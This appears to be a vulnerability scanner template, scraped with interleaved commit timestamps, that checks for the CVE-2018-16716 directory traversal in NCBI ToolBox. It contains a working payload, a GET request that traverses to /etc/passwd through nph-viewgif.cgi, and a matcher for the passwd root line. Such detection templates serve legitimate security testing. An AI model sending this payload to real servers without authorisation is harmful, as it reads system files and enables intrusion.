2022-02-28 13:42:01 +00:00
id : CVE-2018-16716
2022-04-22 10:38:41 +00:00
2022-02-28 13:42:01 +00:00
info :
name : NCBI ToolBox - Directory Traversal
author : 0x_Akoko
2022-05-17 09:18:12 +00:00
severity : critical
2022-05-18 20:58:07 +00:00
description : NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
2022-02-28 13:42:01 +00:00
reference :
- https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-16716
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score : 9.1
2022-02-28 13:42:01 +00:00
cve-id : CVE-2018-16716
cwe-id : CWE-22
2022-02-28 21:26:06 +00:00
tags : cve,cve2018,ncbi,lfi
2022-02-28 13:42:01 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2022-05-18 20:58:07 +00:00
# Enhanced by mp on 2022/05/18